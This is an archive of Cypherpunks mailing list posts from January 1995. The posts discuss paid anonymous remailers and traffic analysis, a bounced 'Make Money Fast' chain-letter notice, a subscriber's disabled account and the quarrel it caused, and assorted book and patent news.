Subject: Chain letter bounced > > You, lmccarth at ducie.cs.umass.edu, have sent a message that seems to contain yet another > copy of the infamous Make Money Fast chain letter. > > If you want to make a complaint, please send just the headers of the > message to admin at anon.penet.fi - albeit as the messages have been blocked > (as you can see), the message probably *didn't* go through anon.penet.fi > but was faked (using NNTP faking or something similar). > [...] > To: cypherpunks at toad.com > From: "L. McCarthy" [...] > Posting letters asking for $$$ is of course a risky venture on Usenet. We > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out [...] -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw0WJGf7YYibNzjpAQEfxAQAiA70W8v7saU4TU+0yJL4XC44uhV50Q34 rX5T1A1ADbPgKeIEX/nImyRP2h6T+V2GdYBWPMJjlVYV1Nyqpxb2kHToocQCbtjd ILyNYew0zHfpZAPeYYM4Y35ru1LoQeg9+COo9RElkS3daMB2gtUjmY2EtfPF6h4V tDei1OHtdl0= =vxjA - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw0XKioZzwIn1bdtAQE2egF/Z5Tjg/dzt8cc/lkFXA/LMd17nNNGYv8N 7E7qlnWAhdz82+cILCVHmfVpHNIfdTUH =xtDg -----END PGP SIGNATURE----- From frissell at panix.com Fri Jan 6 03:23:19 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 6 Jan 95 03:23:19 PST Subject: C'punks Economist Fan Club Message-ID: <199501061123.AA10001@panix.com> >It's witty, politically >aware, relatively technically savvy. The articles exhibit a healthy (IMHO) >cynicism about what happens and why, yet maintain some idealism about what >should happen. It's not perfect, but it's difficult to imagine surpassing it. The Economist is fully informed and funny. What domestic news magazine would include the following in one of *their* leads (editorials): Circa 1987 "It is unlikely that Gorbachev has included an invasion of Western Europe in his next Five Year Plan but his generals *have* made their preparations. Lucky Britain is in the *Polish* Army's Zone of Occupation." DCF -- Have you registered a domain today. My template worked first time and I have since registered nine domain names. Send for a free copy. From frissell at panix.com Fri Jan 6 03:23:20 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 6 Jan 95 03:23:20 PST Subject: True Names Message-ID: <199501061123.AA10015@panix.com> > >--Mike, still looking for a copy himself > Boy, for people who can make the World's Governments tremble with the click of a keyboard some of you seem a bit print disabled. How to buy an Out of Print Book (c) 1995 Offshore Enterprises 1) Find an OP book search specialist 2) Ask he/she to find it for you 3) Pay for it To accomplish 1), ask at (independent) bookstores in your vicinity (those are places you may have seen around town full of processed tree carcasses), libraries, etc. DCF -- Correlation between (40 years of pack-a-day)second-hand smoke and cancer: +1.19 Correlation between having had an abortion and cancer: +1.50 Correlation generally accepted as significant for disease studies: +3.00 From nsb at nsb.fv.com Fri Jan 6 04:28:54 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 6 Jan 95 04:28:54 PST Subject: Remailer Abuse In-Reply-To: <4748.789282395.1@nsb.fv.com> Message-ID: Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db at Tadpole.COM (1180*) > Heh. An anonymous remailer paid for by credit card... there'd > have to be an additional level of indirection for it to work, > which would make the methods for tracking those who don't pay > quite problematic. Again, this comes down to definitions of anonymity. In this case, if you start from the silly assumption that the anonymous remailer actually keeps records that correlate messages to payment mechanisms, Doug is right, but barely. To break the anonymity, you'd need collusion between the operator of the anonymous remailer AND First Virtual, because the former knows which account sent a message, and the latter knows who that account belongs to. (And before you tell me that this sounds a lot like the Clipper key escrow, I would point out that instead of two "trust us, they're independent" agencies of the US government, in this case we're talking about two independent private companies which are probably in two different countries. For my part, I figure that if the government of Finland and the government of the US can actually agree that it's so important to force the sacrifice of anonymity in a given case that they're both willing to coerce companies under their jurisdiction, they will probably have a very good reason for doing so. Maybe I'm too trusting, though.) Moreover, and perhaps most important, even THIS can only be done if the anonymous mailer keeps records of WHICH account paid for WHICH posting, and if I were to operate a for-pay remailer, I wouldn't do that anyway. It sort of defeats the whole point of the service. > Also, most remailer abuse tends to be of the hit-and-run variety, > which is still nicely enabled by FV. Only if you assume that the same people aren't responsible for multiple hit-and-run attacks. I would tend to assume the opposite. Russ Nelson saw the first point quite clearly, and wrote: Excerpts from mail: 5-Jan-95 Re: Remailer Abuse nelson at crynwr.com (1177) > Sure, I'll know who used it, but I'm not going to keep that > information. (Yes, yes, FV says that I have to keep records of who > bought what, but I'll label all my information with a random number, > that simply says that X bought information worth Y, not *what* > information.) And if you don't trust a remailer operator, then you > won't use it. All I'd add here is that the requirement to keep records is one that we have to pass on from the credit card world. If you didn't keep ANY records, my understanding is that all that this would really mean in practice is that there would be an extremely strong presumption AGAINST you in certain dispute-resolution situations. That's just my understanding, however, and it doesn't in any way supersede or supplement our legal terms and conditions, available from fineprint at fv.com. (You should try them, I find them more effective than Sominex.) Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs at anchor.ho.att.com (2028) > I'd be worried about a couple of issues - > one is just the transaction cost - can you successfully market remailer use > at a buck a shot or whatever you'd be charging beyond FV's 29c stamp, > or would you have some convenient way to aggregate bill? Depending on how often you aggregate, you can charge almost any amount. 20 cents might be very reasonable. If you run a cron job once a month to post aggregated billings to anyone who had two or more outstanding uses, you'd make only a small amount on the two-time users, but you'd get serious aggregation from the regular users. (You might also want to bill the really-high-volume users weekly, to prevent them from going into shock at their huge monthly bills.) > Beyond that, though, are some traffic analysis problems - > remailers require a fair bit of traffic to be useful, and unless > you receive a reasonable amount of encrypted traffic, > and support encrypted email for purchasing remailer service > and other merchandise, an eavesdropper would have a fairly good source > of traffic data on your remailer users, especially since buying and using > remailer service requires two messages within an hour or so. Well, I think low-volume remailers are always a bit vulnerable to traffic analysis attacks, aren't they? One thing you could do is build a variable time-delay into the remailer, to make it harder to correlate messages coming in with those going out. To take paranoia a step further, you could allow people to encrypt their mail TO an anonymous remailer with the remailer's public key, and let the remailer send it out unencrypted. No snooper should be able to correlate the *contents* that way, and it avoids lots of key management problems by only using the remailer's key, not the user's. > An alternative billing mechanism, which wouldn't use Chaum-patented cash, > would be to sell a bunch of one-shot random-number tokens. > When you sell the tokens, you add them to the database of valid tokens, > and when one comes in on a message you delete it. > This allows you to sell more than one message or service-period per > FV transaction, and separates the purchase and use by a longer time, > without adding the need for record-keeping based on the user's ID. > It obviously does require encrypted reply messages. I think this could work quite nicely, at first glance. This is also the kind of service for which you might want to wait until after the "yes" reply to deliver the "goods". My only concern, would be the key management issues, but they might be manageable in this case by using the equivalent of a session key, instead of a permanent personal key. I think this is a promising idea. -- Nathaniel From rishab at dxm.ernet.in Fri Jan 6 06:06:39 1995 From: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) Date: Fri, 6 Jan 95 06:06:39 PST Subject: PATNEWS: PTO accepting USENET FAQs are formal prior art In-Reply-To: <199501040304.AA01233@world.std.com> Message-ID: Thought I'd pass this on... -Rishab srctran at world.std.com (Gregory Aharonian) writes: > !010394 PTO accepting USENET FAQs as formal prior art > > It seems that the US Patent Office is accepting Internet USENET FAQs > (Frequently Asked Questions - periodic postings on USENET groups with > questions and answers) as prior art. As you see in the following entry > from my software prior art database, one of the Other References is to > a cryptography FAQ. If any knows if the European Patent Office is accepting > USENET FAQs, and has an example, let me know. > > Thus if an examiner objects to your use of a FAQ as prior art, cite > this patent (NTIPAFCAP*). It probably would be helpful if the PTO came out > with a quick guideline to a consistent way of doing so. I suppose archiving > FAQs is one more thing I can add to my databases. > > It's nice to see the PTO embracing part of the Internet, even as it > rejects other parts of the Internet. Eventually, though, the PTO will have > to choose one or the other. > > Greg Aharonian > Internet Patent News Service > (for subscription info, send 'help' to patents at world.std.com ) > (for prior art search services info, send 'prior' to patents at world.std.com ) > (for WWW patent searching, try http://sunsite.unc.edu/patents/intropat.html > ==================== > > TYP[USPAT] > NUM[5371794] > ASS[Sun Microsystems] > CUN[USX] > ISD[19941206] > CLS[380/21] > ART[222] > LOC[] > GRG[] > TIT[Method and apparatus for privacy and authentication in wireless networks] > ORF[5] > ORFTXT[ > Authentication and Authenticated Key Exchanges, Authors: Diffie, Oorschot & > Weiner, Published by Designs, Codes & Cryptography 2, 107-125, > .COPYRGT.1992 Kluwer Academic Publishers. > The First Ten Years Of Public Key Cryptography, Author: Whitfield Diffie, > Reprinted from Proceedings of the IEEE, vol. 76, No. 5, May 1988. > > Overview of Cryptology: Summary Of Internet Cryptology Frequently Asked > Questions (Oct. 1992). > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > The Keys To Privacy and Authentication, Publication by RSA Data Security, > Inc., 100 Marine Parkway, Redwood City, Calif. 94065. (Oct. 1993). > Answers To Frequently Asked Questions About Today's Cryptography, Author: > Paul Fahn, RSA Laboratories, 100 Marine Parkway, Redwood City, Calif. 94065 > (Sep. 1992). > ] > > > ============================================================================= > > (NTIPAFCAP* = Not that issued patents are formally citable as precedent). ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From carolann at mm.com Fri Jan 6 06:40:49 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 06:40:49 PST Subject: C'punks Economist Fan Club In-Reply-To: <199501061123.AA10001@panix.com> Message-ID: This I hope shows I can keep my humor level a bit. How does "CENSORED.COM" sound? My original reply is still in suspended composition. On Fri, 6 Jan 1995, Duncan Frissell wrote: > Have you registered a domain today. My template worked first time and I > have since registered nine domain names. Send for a free copy. > From nesta at nesta.pr.mcs.net Fri Jan 6 07:02:07 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Fri, 6 Jan 95 07:02:07 PST Subject: All I did was properly crosspost! In-Reply-To: Message-ID: On Fri, 6 Jan 1995, Carol Anne Braddock wrote: > > I first saw the Dubois Letter in alt.security.pgp the 28th. > PRZ posted it here the next day. > > I "crossposted" it to my favorite 10 newsgroups. Just 10. > Some creep complained. (we'll get to him a bit later). > ten is not a large number when it comes o cross-posting on soem topics, I can think of at lezast tewenty newsgroups where the PRZ letters and such would make alot of sense and be on topic. This just goes to show the soemtimes reactionar steps people take to control spamming. it leads to people getting hurt, especially whent he sysop at your site is nto intelligent enough to look aat the article, and see wether or not it was cross-posted to valid groups etc..and not only that, but to completely pull your account for such a small thing(ten groups? that's nothing in comparison to some aticles out there still going) What is the name of the sysop at that site your account was pulled form? > But to take my account away for crossposting to 10 groups is not right. > I agree, ten groups is a small amount, especially if they are at least amrginally on topic. This is soemthing that we need to watch out for tho, it makes people fearful of spreadung information, when evenif you spread it in a nice manner, to on-topic groups etc.. that you face the chance of some bozo net-vigilante complaining to your sysop and having your account yanked. >From teh evidence here it seems the sysop acted in a reactionary manner, probably out of fear of some asshole mailbombing your account. I heartily reccomend that those of you who do not know your sites policies for such, become aquainted with them, or at least contact the syspo and talk about this issue. If you contact him and talk to him(her) about it then they are less likely to react so quickly and IMO stupidly. It's amazing how much just knowing your sysops first name helps in such a situation. As for MCs, I am not sure of their policies but Karl is very reliable, and I doubt he would be so reactionary, in any case, I'll contact him about such policies. From MFROOMKI at umiami.ir.miami.edu Fri Jan 6 07:35:46 1995 From: MFROOMKI at umiami.ir.miami.edu (Michael Froomkin) Date: Fri, 6 Jan 95 07:35:46 PST Subject: Sorehand mailing list Message-ID: While I was abroad, someone from this list asked me for the address for the SOREHAND mailing list, which helps those suffering from repetitive strain injuries (RSI), including carpal tunnel syndrome. I didn't have the listserve info in England, and somehow lost the request before I got back. Figuring, however, that cypherpunks write code, that writing code causes RSI, and hence this address might be of more general interest, here it is: to subscribe, send a SUBSCRIBE SOREHAND to Listserve at ucsfvm.ucsf.edu A.Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) U.Miami Law School | MFROOMKI at UMIAMI.IR.MIAMI.EDU PO Box 248087 | Coral Gables, FL 33146 USA | It's warmish here, almost cool. From carolann at mm.com Fri Jan 6 08:18:03 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 08:18:03 PST Subject: Sorehand mailing list In-Reply-To: Message-ID: Yes, Michael I might get SOREHAND having to rewrite all my HTML code. Thanks for the great tip. An ounce of prevention, is worth a pound of cure. Love Always, Carol Anne ps and here's the SOREHAND M/L address in case you trashed it. On Fri, 6 Jan 1995, Michael Froomkin wrote: > While I was abroad, someone from this list asked me for the address > for the SOREHAND mailing list, which helps those suffering from > repetitive strain injuries (RSI), including carpal tunnel syndrome. > I didn't have the listserve info in England, and somehow lost the request > before I got back. > > Figuring, however, that cypherpunks write code, that writing code causes > RSI, and hence this address might be of more general interest, here it is: > > to subscribe, send a SUBSCRIBE SOREHAND to > > Listserve at ucsfvm.ucsf.edu > > A.Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) > U.Miami Law School | MFROOMKI at UMIAMI.IR.MIAMI.EDU > PO Box 248087 | > Coral Gables, FL 33146 USA | It's warmish here, almost cool. > > From carolann at mm.com Fri Jan 6 08:43:15 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 08:43:15 PST Subject: Chain letter bounced (fwd) In-Reply-To: <199501061011.FAA23248@bb.hks.net> Message-ID: Thanks for the great article....I chuckled a lot, and I haven't had a lot to chuckle about these days..... But I still think that as the computer program we trust the most, he deserves overt support in all phases of of my life. Even though I am dead broke, I could tell my main newsgroups. I wasn't asking or telling. Just informing. And it was to .1% of all Usenet ....That...is...not...a...lot! I am sure the real point of your post will come through, but for now I'm kinda clueless. Love always, Carol Anne On Fri, 6 Jan 1995, L. McCarthy wrote: > [...] > > To: cypherpunks at toad.com > > From: "L. McCarthy" > [...] > > Posting letters asking for $$$ is of course a risky venture on Usenet. We > > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the > > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out > [...] > > -L. Futplex McCarthy From dcwill at python.ee.unr.edu Fri Jan 6 08:51:10 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 6 Jan 95 08:51:10 PST Subject: Remailer anonymity Message-ID: <199501061656.LAA26109@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Much has been said lately about maintaining anonymity for remailer users while providing some "pay to play" mechanism for the operator. Absent strong collusion between operators, doesn't remailer chaining ensure anonymity? Plenty of movie "bad guys" escape by getting on the subway because no one knows where they'll get off or change lines. It seems to me that knowing a person entered the system is far less information than knowing where they exited. As long as remailers have guaranteed access to other remailers, anonymity should be maintained. Re: collusion; I'd sooner believe the Macro$oft/RCC fable. In a gadda da vida, Billy. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw12MioZzwIn1bdtAQH+XQF/RGe9sufCmL8KB2ARuyJNChmF+ZA4DRlf cCnAwpyUhRRtWdpDRx7wZxopjvPHUYDC =kVwM -----END PGP SIGNATURE----- From carolann at mm.com Fri Jan 6 09:26:14 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 09:26:14 PST Subject: Chain letter bounced (fwd) In-Reply-To: <199501061705.LAA04565@monad.armadillo.com> Message-ID: Inasmuch as I sent the prior posting the way I did, (as I can only read one letter at a time), You do not speak for all the cypherpunks, neither do I. On the time cronology you are the first to complain about the account closing notice. That doesn't constitute a WE yet. So please do not send me further personal mail. I'm glad I'm not so clueless about Stalking Laws in the State of Minnesota. Now I've go to my free.org account and get my Star-Trib address archive back. Carol Anne Braddock signed 1/6/95 11:25 A.M. On Fri, 6 Jan 1995, david d `zoo' zuhn wrote: > // come through, but for now I'm kinda clueless. > > Very very true. > > And please stop including this stuff at the end of every message. WE DON'T > CARE. > > > // From carolann at vortex.mm.com Fri Jan 6 01:39:29 1995 > // Date: Thu, 5 Jan 1995 21:57:05 -0600 > // From: Carol Anne Braddock > // To: carolann at vortex.mm.com > // > // [icicle.winternet.com] > // Login name: carolann In real life: CarolAnne Braddock > // Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > // Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > // New mail received Thu Jan 5 21:16:23 1995; > // unread since Mon Jan 2 13:18:25 1995 > // Plan: > // This account has been disabled permanently. > // > // Mike Horwath - Admin - Winternet - drechsau at winternet.com > // > > From carolann at mm.com Fri Jan 6 09:39:26 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 09:39:26 PST Subject: All I did was properly crosspost! In-Reply-To: Message-ID: On Fri, 6 Jan 1995, Nesta Stubbs wrote: > On Fri, 6 Jan 1995, Carol Anne Braddock wrote: > ten is not a large number when it comes o cross-posting on soem topics, I > can think of at lezast tewenty newsgroups where the PRZ letters and such > would make alot of sense and be on topic. This just goes to show the > soemtimes reactionar steps people take to control spamming. it leads to > people getting hurt, especially whent he sysop at your site is nto > intelligent enough to look aat the article, and see wether or not it was > cross-posted to valid groups etc..and not only that, but to completely > pull your account for such a small thing(ten groups? that's nothing in > comparison to some aticles out there still going) What is the name of the > sysop at that site your account was pulled form? > His name is Michael Horwath, root at winternet.com > > But to take my account away for crossposting to 10 groups is not right. > > > I agree, ten groups is a small amount, especially if they are at least > amrginally on topic. > > This is soemthing that we need to watch out for tho, it makes people > fearful of spreadung information, when evenif you spread it in a nice > manner, to on-topic groups etc.. that you face the chance of some bozo > net-vigilante complaining to your sysop and having your account yanked. > >From teh evidence here it seems the sysop acted in a reactionary manner, > probably out of fear of some asshole mailbombing your account. > > I heartily reccomend that those of you who do not know your sites > policies for such, become aquainted with them, or at least contact the > syspo and talk about this issue. If you contact him and talk to him(her) > about it then they are less likely to react so quickly and IMO stupidly. > It's amazing how much just knowing your sysops first name helps in such a > situation. > > As for MCs, I am not sure of their policies but Karl is very reliable, > and I doubt he would be so reactionary, in any case, I'll contact him > about such policies. > > From carolann at mm.com Fri Jan 6 09:46:03 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 09:46:03 PST Subject: All I did was properly crosspost! harrassments another story In-Reply-To: <199501061733.LAA04744@monad.armadillo.com> Message-ID: On Fri, 6 Jan 1995, david d `zoo' zuhn wrote: > Sorry, but I don't flame in public fora. I do so in email only. > > The Michigan precedent for email stalking isn't very strong (it also > included several incidents of physical contact as well), so you threats are > not really too worrisome. The last time I checked with various folks about > the Minnesota laws, it's not exactly too clear on email (prosecution in the > situation in question was declined due to lack of confidence in > conviction), so again, I'm not very worried. > > But it doesn't matter since you've just entered my global kill files. > Anything you send to me won't be seen at all. Anywhere. Anyhow. News. > Mail. Etc. Plonk! > > And as a personal note, if your concept of 'dealing' involves making legal > threats at the first possible instance of disagreement, then I think you > need a new concept of 'dealing'. > > From anonymous-remailer at shell.portal.com Fri Jan 6 09:47:43 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 6 Jan 95 09:47:43 PST Subject: TRUE NAMES FOR FREE Message-ID: <199501061748.JAA12677@jobe.shell.portal.com> Angus Patterson wrote a short while ago: S6>I've been trying to get True Names by Vernor Vinge, and have been told it's >out of print (like most good cypunk ), does anybody have it scanned? Laissez Faire Books has a stockpile and they're giving them away! LF sends you _True_Names_ free when you buy _Solomon's Knife_ by Victor Korman (a pen-name). Order FN5136, $9.95 for both + $3.25 shipping: Laissez Faire, 938 Howard Street #202, San Francisco, CA 94103, tel 800-326-0996, fax 415-541-0597. They have their own Laissez Faire Book News list, too, with previews and samples. Ask Chris Whitten for more info at . "Capt'n Bob" Correspondents: Communications went down recently when 2 remailers shut up shop. A new address will be up and running during next week. From carolann at mm.com Fri Jan 6 10:03:17 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 10:03:17 PST Subject: Your HomePage at winternet.com In-Reply-To: <199501061739.AA29180@xs1.xs4all.nl> Message-ID: Dear Alex, We have all the web pages. They should be moving to spring.com shortly. It's kinda sad that they bootleg off my net.web.goodwill, as My pages are are at the 200+ access count and rising level per day. The Webbittown pages will remedy this in the not too distant future. (PGP encoded HTML) They should be down by the end of the day. Love Always, Carol Anne > -- > Alex de Joode > usura at replay.com Hate mail appreciated, > http://www.xs4all.nl/~usura weekly contest for best death threat. > > > From carolann at mm.com Fri Jan 6 10:14:39 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 10:14:39 PST Subject: Guess what I just got In the mail? giggle..giggle Message-ID: ---------- Forwarded message ---------- Date: Fri, 6 Jan 95 18:57:36 +0200 From:daemon at anon.penet.fi To: carolann at mm.com Subject: Chain letter bounced You, carolann at mm.com, have sent a message that seems to contain yet another copy of the infamous Make Money Fast chain letter. If you want to make a complaint, please send just the headers of the message to admin at anon.penet.fi - albeit as the messages have been blocked (as you can see), the message probably *didn't* go through anon.penet.fi but was faked (using NNTP faking or something similar). If you are trying to *post* the chain letter, please read the following: By now you should know that the net doesn't find all the waste of networking resources, time and money this stupid and illegal scam has caused amusing at all. I have actually been forced to incorporate an automatic chain letter detector / bouncer just for this... Here is the appropriate FAQ: - - - - - - - - - - - - - - - - - - - This FAQ is for the benefit of those who have never experienced the advertisement MAKE.MONEY.FAST. Here are some answers to some questions frequently asked. 1. Does MAKE.MONEY.FAST really work? Not in the sense that you'll make money fast, but you'll make a lot of enemies fast. 2. If I forward or repost MAKE.MONEY.FAST, will I get a lot of mail? Yes, hate mail, flames, etc. 3. How can I get my account cancelled? Post MAKE.MONEY.FAST. 4. How can I get my system administrator mad at me? Post MAKE.MONEY.FAST. His mailbox will be so full of complaints, it'll take him/her a week to sort through all of them. 5. Who is Dave Rhodes? Salmon Rushdie's roommate. Just about every administrator wants to kill him so he had to go in hiding. 6. How can I assure I have a long and prosperous life? Well, nobody can guarantee that, but it can be guaranteed that if you post MAKE.MONEY.FAST you're life may be cut short by accident (hee hee). 7. Just how does one have to never work again after posting MAKE.MONEY.FAST? Well, MAKE.MONEY.FAST is a Ponzi scheme. Ponzi schemes are illegal. Ponzi schemes are a form of fraud. Some of these net interchanges go over telephone wires, optic fibers, and microwave transmissions all regulated by the FCC. If you repost MAKE.MONEY.FAST over the net, and someone at the FCC wanted to get nasty, they may want to prosecute you for WIRE fraud. Once you're in jail, you never have to pay rent, your meals are free. Anal injections are free. MAKE.MONEY.FAST has a lot of side benefits. 8. How can I help to stop the spread of MAKE.MONEY.FAST? When some netter newbie blunders and posts MAKE.MONEY.FAST on the net, just send him a polite letter to not do it again (remember, the newbies act out of ignorance) then write the root at domain and request they inform all their users not to perpetuate this drivel. - - - - - - - - - - - - - - - - - - - Contents of message follows: X-Envelope-To: na166182 Received: by anon.penet.fi (5.67/1.35) id AA19254; Fri, 6 Jan 95 18:50:45 +0200 Received: from relay2.uu.net(192.48.96.7) by anon.penet.fi via anonsmtp (V1.3mjr) id sma017754; Fri Jan 6 18:47:54 1995 Received: from toad.com by relay2.UU.NET with SMTP id QQxxnn06516; Fri, 6 Jan 1995 11:50:16 -0500 Received: by toad.com id AA06017; Fri, 6 Jan 95 08:43:15 PST Received: from vortex.mm.com ([204.73.34.1]) by toad.com id AA05996; Fri, 6 Jan 95 08:42:58 PST Received: from downburst.mm.com (carolann at downburst.mm.com [204.73.34.2]) by vortex.mm.com (8.6.9/8.6.6) with ESMTP id KAA28027; Fri, 6 Jan 1995 10:48:27 -0600 Received: (carolann at localhost) by downburst.mm.com (8.6.9/8.6.6) id KAA13250; Fri, 6 Jan 1995 10:48:16 -0600 Date: Fri, 6 Jan 1995 10:48:16 -0600 (CST) From: Carol Anne Braddock Subject: Re: Chain letter bounced (fwd) To: "L. McCarthy" Cc: cypherpunks at toad.com In-Reply-To: <199501061011.FAA23248 at bb.hks.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cypherpunks at toad.com Precedence: bulk Thanks for the great article....I chuckled a lot, and I haven't had a lot to chuckle about these days..... But I still think that as the computer program we trust the most, he deserves overt support in all phases of of my life. Even though I am dead broke, I could tell my main newsgroups. I wasn't asking or telling. Just informing. And it was to .1% of all Usenet ....That...is...not...a...lot! I am sure the real point of your post will come through, but for now I'm kinda clueless. Love always, Carol Anne On Fri, 6 Jan 1995, L. McCarthy wrote: > [...] > > To: cypherpunks at toad.com > > From: "L. McCarthy" > [...] > > Posting letters asking for $$$ is of course a risky venture on Usenet. We > > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the > > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out > [...] > > -L. Futplex McCarthy >From carolann at vortex.mm.com Fri Jan 6 01:39:29 1995 Date: Thu, 5 Jan 1995 21:57:05 -0600 From: Carol Anne Braddock To: carolann at vortex.mm.com [icicle.winternet.com] Login name: carolann In real life: CarolAnne Braddock Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern New mail received Thu Jan 5 21:16:23 1995; unread since Mon Jan 2 13:18:25 1995 Plan: This account has been disabled permanently. Mike Horwath - Admin - Winternet - drechsau at winternet.com From anonymous-remailer at shell.portal.com Fri Jan 6 10:40:21 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 6 Jan 95 10:40:21 PST Subject: SysAdmin of the year Message-ID: <199501061846.NAA26994@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > > According to Carol Anne Braddock: > His name is Michael Horwath, root at winternet.com ^^^^^^^^^^^^^^^ > [icicle.winternet.com] > Login name: carolann In real life: CarolAnne Braddock > Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > New mail received Thu Jan 5 21:16:23 1995; > unread since Mon Jan 2 13:18:25 1995 > Plan: > This account has been disabled permanently. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34 =wNlp -----END PGP SIGNATURE----- From carolann at mm.com Fri Jan 6 10:57:46 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 10:57:46 PST Subject: your mail In-Reply-To: <20014f17.39f3-niallm@avernus.internet-eireann.ie> Message-ID: Is that better...giggle... Hope you make and hand out some hard copies! Love Always, Carol Anne ps if it was you instead of Zimmy the result would have been the same, I think. I'll rant why I'm actually on the list soon From carolann at mm.com Fri Jan 6 11:03:12 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Fri, 6 Jan 95 11:03:12 PST Subject: There.....Do ya like this one better? Message-ID: Signature withdrawn at the request (pretty rightfully so) of my dear friends on the Cypherpunk List. Coming Soon: The Internet Debut of CENSORED.COM From jrochkin at cs.oberlin.edu Fri Jan 6 11:16:09 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Fri, 6 Jan 95 11:16:09 PST Subject: Remailer Abuse Message-ID: At 7:28 AM 01/06/95, Nathaniel Borenstein wrote: >Again, this comes down to definitions of anonymity. In this case, if >you start from the silly assumption that the anonymous remailer actually >keeps records that correlate messages to payment mechanisms, Doug is >right, but barely. To break the anonymity, you'd need collusion between >the operator of the anonymous remailer AND First Virtual, because the >former knows which account sent a message, and the latter knows who that >account belongs to. (And before you tell me that this sounds a lot like While this might be secure enough for some people, it is important to note that it definitely is less secure then the current free remailer net. Currently, if I send my message through 10 remailers, many more then just two of the operators need to cooperate in order to get my true identity. I think that at least 8 or 9 of them do, actually. In a First Virtual payment-scheme remailernet, no matter how many remailers I send my message through, any _one_ operator, together with First Virtual, can burst my anon bubble. I suppose this still might be enough security for some people. After all, penet is enough security for some people. But I'd guess that most people using cypherpunks remailers instead of Julf's penet remailer aren't going to be willing to settle for it, because it doesn't give you very much more security then penet. My trust of Julf, who has an amazingly good reputation on the net and furthermore isn't in the U.S. (and presumably isn't subject to U.S. government coercion), certainly isn't any less then my trust of First Virtual. And if I'm still sending through 10 remailers, which I'd be doing for traffic analysis reasons, any _one_ of them, together with FV, can compromise me. Weakest link in the chain. Which means my risk _rises_ with increased remailer chain length. If I was willing to accept that level of risk, I'd just use penet which is much more convenient. The First Virtual method does seem possible for Julf's remailer, since users are pretty much already trust Julf completely, so the Julf+FV system isn't any less secure then the just Julf system. But it's just not anonymous enough for cypherpunks-style remailers. From adam at bwh.harvard.edu Fri Jan 6 11:19:04 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 6 Jan 95 11:19:04 PST Subject: Remailer Abuse In-Reply-To: Message-ID: <199501061911.OAA08861@bwnmr5.bwh.harvard.edu> nsb wrote: | Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db at Tadpole.COM (1180*) | > Heh. An anonymous remailer paid for by credit card... there'd | > have to be an additional level of indirection for it to work, | Again, this comes down to definitions of anonymity. In this case, if [...] | two different countries. For my part, I figure that if the government | of Finland and the government of the US can actually agree that it's so | important to force the sacrifice of anonymity in a given case that | they're both willing to coerce companies under their jurisdiction, they | will probably have a very good reason for doing so. Maybe I'm too | trusting, though.) Its also a matter of analysing your threats. There may be employees of one or more companies involved who might sell information. Then again, if you're selling plans of the B2 to the Iraqis, the US & Norwegian governments might collude to track you down, (and in the 